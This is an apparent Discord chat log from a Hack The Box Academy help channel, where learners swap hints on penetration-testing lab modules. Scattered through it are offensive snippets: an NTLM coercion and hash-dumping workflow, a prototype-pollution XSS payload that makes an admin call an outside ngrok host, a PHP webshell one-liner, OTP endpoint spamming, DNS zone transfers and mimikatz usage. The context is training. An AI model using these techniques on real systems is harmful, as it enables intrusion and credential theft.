if you've able to use getnthash and secretsdump you're good to go
What do you mean coerce again? Use petitpotam.py to get the certificate base64 again?
yes
Huh am I blind 😭
lol what
I see it too
hmmm I shall try that 🤔
it is at the very second to last line of your screenshot
Spam the endpoint /api/v1/authentication/customers/passwords/resets/sms-otps and after enough tries it will give you an extra response
I had a query in a challenge. Is this the right place to ask? Or some other channel?
Ohhhhh. Thanks!
I have a question. I am trying to do the Linux Fundamentals module and I'm stuck on "find files"; it keeps giving me permission denied and the solution doesn't help.
Are you ssh'd to the target?
So when you do whoami it says "htb-student"?
If not: then you aren't ssh'd
The target is the "Click here to spawn target!" / 10.129.x.x ip
Spawn Instance is the in-browser vm, pwnbox
They are not the same
@fathom pendant nevermind I need to 2>/dev/null to remove the errors
K
Btw you won't be able to update targets
As they're not connected to the internet
huh that doesn't work though, I'm looking for a flag, that's just the output it's giving to the search result
what's your guys' opinion on the Web Services and API module? it seems really confusing to me
Windows Lateral Movement, focusing on both offensive and defensive?
actually, the module artwork has the win11 logo, so we're getting some good up-to-date content
can someone explain to me what I actually need to do in this question, even though I am able to log in with the provided details :- Module: Broken Authentication (section: Enumerating users). Do I need to fuzz?
it uses netexec
dont worry i have changed the target ip
yea but it's nice to see the win11 content as well
I mean win11 and win10 are pretty much the same under the hood
i haven't seen too much of it
That's not the flag though, how am I supposed to find it 🤔
yes
Have you tried searching for it?
iirc, you have to create a city named flag, then delete any city from the cities list of the server and search for flag
I could be wrong I don't remember exactly
still curious about the module though
web requests
He means the new one
no, the Lateral Movement module
can someone also help me
Sure
WMI, DCOM and WSUS are the interesting ones to me
this1
those all seem to correlate with privileged access
Searching for it where?
lol I'll have to try that
I think there are impacket scripts that exploit access to those
Yes you need to fuzz
As described by the section @ebon nymph
bro can you help me with the command, I am using the default command which is provided in the writeup
You have to enumerate the web app to potentially find valid users and provide the username of the user you've found as the answer
bro can I use burpsuite here instead of ffuf
Footprinting module - DNS
I am struggling with the last question. From what I understood I am supposed to do some DNS subdomain bruteforcing, but I can't get anything useful back. I don't even find all the hosts that I know exist from the zone transfer (especially dev doesn't show up, I tried with my own list to make sure)
Here is my command
dnsenum --dnsserver 10.129.73.53 --enum -p 0 -s 0 -f /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -r inlanefreight.htb
Am I doing something wrong, or should I just keep trying every wordlist from SecLists until it works? I tried to enumerate the internal zone as well but it returns an error, so I am guessing it is not there
Any help will be greatly appreciated!
I mean you just need to use the right wordlist and filter out the string
subdomains of subdomains
ok
just do a base transfer, no bruteforce
dig axfr inlanefreight.htb @ip
Wait, is there no bruteforce for the last question? The hint is about wordlists so that seems odd
it is
That worked, thank you 😭 I did not think of doing that, when people were saying search I thought they were talking about network requests or something... just a bit confusing
but to get the right initial subdomain you don't need to bruteforce it
but you can't bruteforce a subdomain of a subdomain that you don't know about
Lol
the answer will be a.b.inlanefreight.htb
Oh yes ok, it is ||internal|| right?
no
oho
you can already transfer to that subdomain, why do you need to bruteforce it?
hi guys, I have a problem: mysql -h 127.0.0.1 -u chamilo -p chamilo
Enter password: 03F6lY3uXAP2bkW8 . I enter the right pass, but mysql is just silent. If I enter a wrong pass, it writes that the pass is wrong
I thought maybe it didn't show me everything but it makes sense now that I won't find anything more
If it accepted to transfer then it trusts me completely
well
it just means that it's set up for those 2 zones
inlanefreight.htb and ||internal||
Hello, any news about the push of the module api attacks in cbbh ? il will launch my exam next monday and i don't want to be surprised ^^
ok interesting
And is there anything that can help me find which subdomain to brute force, or should I try every one of them?
Thanks a lot already, that's very helpful
did you try: mysql -h 127.0.0.1 -u chamilo -p
and then wait for it to ask for the password?
try them all to see what sticks
what I did was just generate a list of all base b.inlanefreight.htb subdomains i found in my initial transfer then use dnsenum against those
as a further hint; you'll need a more fierce wordlist
it didn't work, it doesn't go any further.
try mysql --user=username --password=password
Hahaha thanks I'll try that
thx
Made it, thank you so much!
Hi, regarding the Client Side Prototype Pollution module, I am facing some difficulty creating the final payload. I cannot seem to send the = between the parameter 'promote' and the value 2: /profile.php?__proto__[src][]=data:,$.get("http://ngrok-app/admin.php?promote=".concat("2")) I tried using this payload, put = both at the end of promote and before 2, and have been checking the responses using ngrok forwarding; whenever I'm sending =, the request isn't being made. For context, ngrok-app will be replaced by the target and is meant to be an XSS session riding attack
Pivoting, Tunneling, and Port Forwarding > Dynamic Port Forwarding with SSH & SOCKS Tunneling: on question 2, my rdp connection is failing
and on my ssh connection it's showing a refused connection
Why doesn't this work?
Not sure why it wouldn't be valid, I tried another one to double check and the same thing happened
also idk why there's the error "could not resolve host" 🤔
Windows is dumb
Escape the quotes
Idr if you need to also escape the curly braces
can someone help me out with this? I just want to get this working in Python and it won't
Your target may not have internet access. It's failing to resolve the domain.
but why does it do the same thing if I give it a private IP address from the local network, or at a minimum it does something similar
-m you're asking to execute a module
in the example it uses -m
that's part of why I'm confused
DM me the module link?
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain RCE on the gitlab instance. Submit the flag in the directory you land in.
Hi, I need help with this question. I found the user D... but not the password. I tried hydra with rockyou, and reviewed the code. But nothing. Somebody pls help :c SOLVED
@trail sail that's a Tier 2 module, please avoid posting spoilers like that. Ask for a nudge mentioning the module and section, but don't post potential spoilers like that please.
Tier 0 modules, it's fine, but anything above please avoid
what do you mean, I just know escaping on Discord uses the \
Yes use \
Before each "
oh fun...
One point, I know that's not a Powershell prompt, but Powershell be weeeeird when it comes to characters like { and quotes.
Looks like rdp isn't running
Windows overall
right & I've reset the host to make sure I'm not going crazy lol
{"a":"b"} On linux
{\"a\":\"b\"} on Windows
See my message just above dude
The double quotes need to be escaped
Not single
Anyway try not to spoiler the module
hm my message was deleted?
oh sorry
oh I didn't think there were any
ohh nvm I see some
now it says no url specified
oh nvm I missed one
It says the same thing now, can I just dm it to you
try escaping the braces as well \{\"a\":\"b\"\}
alright
I remember looking it up
short answer though is: windows sucks for this sort of thing
hmm it still says the same thing :/
Hello, sorry to interrupt, has anyone done Escaping IDS/IPS in Nmap? I am stuck on the medium challenge :/
'\{\"search\":\"flag\"\}'
@onyx cairn I also just thought of something; visit the webpage -- open devtools --> network -- do a search -- select the request -- copy for curl (Windows)
hm okay
it'll provide you the proper formatting
so you're not just guess and checking
also you might need to do -u http://ip:port
idk why you're not doing this in a linux vm
I did try slowing the speed, using a specific NSE script on the port, tried UDP and ACK just to make sure, and random source packets as well
Still seems unable to grab the DNS version.
I tried that but got an error, I'll just try again
try from the pwnbox; this one can seem weird
Moreover I get this weird error on both pwnbox and my local system:
nmap: traceroute.cc:653: virtual unsigned char* ICMPProbe::build_packet(const sockaddr_storage*, u32*) const: Assertion `source->ss_family == AF_INET' failed.
zsh: IOT instruction sudo nmap -p 53 10.129.2.80 -A -T3 --script dns-nsid -D RND:5 -Pn
you don't need to do RND
did you copy the one for (Windows)?
but that's at least a start here
now you just need to fix the -d if it's not escaped any characters
hm first of all why can't I paste things into the Linux terminal 🥲
ctrl+shift+v
Still, port is filtered
ctrl+v enables verbose mode - it enters the literal next character you press
in ye-olde days it was ctrl+shift+c == ctrl+shift+v
Got it now, had to change to different scan type!
Any idea about this error? Happens on pwnbox as well at speed T3-4 with the -D flag set.
Just curious
oooh ty
@onyx cairn use --trace-ascii with curl to see exactly what it is sending
If the server is saying invalid JSON, then something funky is going on with how cmd is parsing your input
Last time I remember this coming up, easiest was to go to a bash prompt instead 😅
oh nvm I got it in the Linux vm, regardless ty for the help!!
👍
is this an error with the module/machine? or did I miss something along the way
try changing vpn regions and resetting the lab fully
still closed
can you try connecting to it? or still same error?
yeah it's windows being dumb
same error, nmap shows it's closed, xfreerdp connection refused - gotta run some errands, I'll try again tonight
thanks for the help though!
it just has to do with a lot of escaping
Don't know if this is the right topic, but I'm busting my head up against the wall for 6 hours!
Can't seem to find a way on the second question.
what module?
it helps to include the module and section name
Sorry! These 6 hours are taking their toll! 🤦♂️
Active Directory Trust Attacks - Skill Assessment
Take it to DM, if someone is willing 🙂
goblin that's barely a spoiler
if we can't talk about the modules at all then this channel is pretty pointless imo
anyways @dapper moth you saw that so just go with it
I tried that attack path which you referenced but can't seem to get the result that I wanted.
Will try other "numbers"
I get it but yeah if there's no info at all it makes helping pretty difficult
something has to be above 1k if you remember that
It's a balance between nudging and spoiling.. I sometimes get that balance wrong when removing messages.
I'm only human 🙈
🎵 I'm only human, after all 🎵
the song indeed bangs
Tried both of the ones enumerated in Bloodhound. Still can't seem to get mimikatz to give me what I want.
dm me what you've got
xls
https://academy.hackthebox.com/module/145/section/1343
Whenever I try any payload the target just times out.
anybody willing to answer a question on https://academy.hackthebox.com/module/23/section/513 ((( Skills Assessment - File Inclusion )))? I got in, I got to where you fuzz, I got the access log, I use burp.. and nothing. I dunno if I have enough or not enough ../ I have a picture I would like to PM so it does not break rules. Pls ping me / reply so I know I got a msg
change vpn and do it again. I had this very issue with somebody, spent like 12 hrs on it just to find the box was broken / not responding; once I changed vpn I finished in like 1 min flat
Hi, in the "Footprinting Oracle TNS" module in the pentester jb path it says "From this point, we could retrieve the password hashes from the sys.user$ and try to crack them offline."
How would we do the cracking?
hashcat is what I like
anyone have any advice for an issue starting impacket's mssqlclient during the Archetype box? (using pwnbox)
every time I try to authenticate using the password and username I know is correct I keep seeing "login failed"
note I'm using <?php system($_GET['cmd']); ?> it just ignores me
ask in #starting-point
I need to log off a bit, pls ping me if I can PM / send a pic so I can see what I'm doing wrong ty ^=^
a new module, interesting. wonder what the difference is between that and the pivot module since the pivot module shows you several ways to pivot through windows machines
says no access
Using the PwnBox.
hey need some admin help I can't identify my user here !
Thank u!
If your command output contains ANSI escape characters, how do y'all get rid of it?
you can output it to a file
If I use the following command to enumerate Domain Users in AD, it returns a file containing ANSI escape chars
sudo crackmapexec smb 172.16.5.5 -u username -p password --users > output.txt
So how do I remove it from that file?
you can use sed/awk
even grep
python, perl, text editor, choose your poison really
I used GPT and it gave this
sed -r 's/\x1B\[[0-9;]*[A-Za-z]//g'
How would you do it using grep? My aim is to be able to filter the list and obtain a user list using grep, that's why I wanna remove the ANSI chars.
first don't use cme anymore, we use netexec now, second --users --log ./users.txt
Haven't gotten around to learning netexec and modifying my cheatsheet just yet 😅
it's just a fork of cme that's being maintained
you don't need to change anything other than calling nxc instead of cme
Oh... so the syntax doesn't change at all?
nope
Okay, thanks for letting me know. I was under the impression that it was a fork but the syntax was changed 😂
It's literally the same tool
Forked by the main people that were actually maintaining cme
Ouhhh, okay. Good to know.
The discussion thread in cme is the background to it
If I wanna use it on a Linux attack host provided to me, I'll have to clone the repo and then use the command make all?
you cry
just pivot
it's free real-estate
indeed
Okie, but just for the know-how, how would I install the tool using the repo?
well considering the targets and such don't have the internet; you'd be spending more time trying to get it compiled to move than you would just pivoting
Alrighty, I'll just pivot 😂
the pivoting module and pivoting in general is an important skill
if done properly you barely need to spend time on any other host once you get what you need
I know how to pivot, was just curious on compiling the tool using the make command.
Noted that I'll prolly never have to compile it tho.
iirc they do have precompiled binaries but those are not recommended
quick question, so I'm working on a skill assessment and the admin is supposed to do something and trigger my payload. I'm sure that my payload works because it worked in the previous section, but it's not working here. I've reset the machine many times and the admin just won't trigger the payload no matter what. I checked the network tab in dev tools and can see that my web browser triggers the payload OK, but still the admin doesn't trigger it. So I was wondering if there's a case where the admin is broken?
Btw when pivoting, I obviously can't ping hosts using their domain name, for example, ms01.inlanefreight.local. But is there a way to do it? Do I need to modify the resolver file or something? (FYI I'm using ligolo).
your hosts file
So if the DC's IP is 172.16.5.3, then I just set the file to this and it should work?
<SNIP>
172.16.5.3 INLANEFREIGHT.LOCAL DC01.INLANEFREIGHT.LOCAL
<SNIP>
I also believe the enum AD module goes over the resolv file as well but i'm not 100%
also DC01
you need the: Domain -- FQDN -- Machine name
Kerberos is funky with how it checks
if you don't reply to what it asks with the right info it's like "nah, i don't trust you"
I see. Noted. I'll try and find where it mentions this. I must've missed it or it's in my notes and I'm just blind, but I do recall it mentioning it.
module: Broken Authentication && section: Bruteforcing password. Which custom wordlist do I need to use?
Does the AD enum module mess with Kerberos much? 
I can't seem to recall even tho I'm finishing up the module now 💀
Read #welcome
can u help me
no, that is one of the few modules I have not completed
rockyou.txt, is this ok?
thanks, I didn't realize, but it seems strange I wasn't verified bc I've talked here before
follow the module, it shows you how to cut down rockyou into a smaller wordlist
Verification has nothing to do with you chatting here
not really, you just need to know what's in the AD module. but for modern AD pentesting kerberos is very important
there's a password policy in place, you should do exactly as the module says, it's pretty much a walkthrough and tells you exactly how to make the custom list from rockyou
Ouhh ok.
@sweet jewel @vapid zodiac I found the trick to fix the insane rdp and other lag: use a 3rd party vpn to connect to the US (full tunnel), then connect to academy vpn
rdp is actually usable now
they said they have no plans for it last I checked 
Which US server?
I'm using US5 now but any one of them works I think
I guess there's not a lot of usage within Asia on academy?
idk I would pay extra to have servers here
real
I've been living off 1 this whole time and rdp is still bad even in the US
it's joever
i'm accepting donations to stop using my instances
they added 2 new US servers, 5 and 6, 5 seems alright for now
they have to keep adding them cuz you dang eu'ers keep coming over here
our servers would be great if you weren't over here. we should build a wall.. a fire wall.
I'm not even from eu 
oh lol
we're from SEA 
build that fire wall
just give us local servers 
is it really because there isn't enough servers or they just need better specs though
It's negotiations with the hosting provider
Overhead costs and such
from SEA also, the lag has been insane
Does this improve it significantly?
well i guess it makes sense that it'd help
yeah as long as the other vpn doesn't drop it works pretty well
but it's a dumb solution tbh
🇺🇸
the only 'vpn' i have is exitlag and thats not even a vpn 
I have an issue connecting to the Windows target. I am on Windows Fundamentals and struggling to connect to the target using xfreerdp. I can't connect to it. Don't know why. Can anyone help?
how can I add extra time so I can work on the same IP (target)?
what problems are you facing?
spin around 3 times, flap your arms 10 times, stomp each foot once, then press the button that extends time
if it is an ip:port address you can't add time, if it is just an ip you'll see a + button or something like that
thanks
like this
wrap the password in single quotes
also add /dynamic-resolution
are you connected to the VPN?
still not working. shows the same as in pic
yes I can connect to the vpn
ip a: run that and see if you have a tun0 or multiple tun devices
only one
also you don't need sudo for xfreerdp
perhaps running with sudo is doing something weird
you have to put the password into single quotes '<password>' and you have lost the exclamation point ! at the end of it
Different error this time but yes put the password in single quotes
thanks let me try again
Also you're missing the ! From the pw in that last screenshot
Utilize the arrow keys to bring a command back up and just replace small parts instead of rewriting every time
reset target and try a new IP
try adding /cert-ignore
is it because of the target?
or use remmina
I thought it was /cert:ignore but I genuinely don't use that option and always have to type Y
yeah their syntax isn't uniform haha
how much ping do you get 😲
same, the AD modules take 3x as long to complete because of the lag
thought the same thing doing those modules even if located in eu on eu servers and rdp can still lag badly last time i checked
200+ but it's stable and doesn't lag all over the place
because you're running the 32bit mimikatz
^
and it's trying to access the 64bit lsa process
eiiii how do I change to 64 bit
architecture issue
printf("meow\n");
or should i download
don't be in the \win32 folder
ooo
at least that's another issue
looks like it's not able to get the memory process freed
You don't have permission
hey
I already run as admin bro
To run Mimikatz
anyone help me for hack
prolly stuck at the previous statement for x32?
im new
nah
take CPTS pathway
😈
i suggest resetting the target tbh
bye
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Sure
hack so bad and evil
not for free
why
Yes bad and Evil
plenty of free resources; and I already volunteer plenty of info here for free.
yh and Take you to jail
Yeah
not illegal here sorry
hey
feels good to live in a free country
anyone rob
lox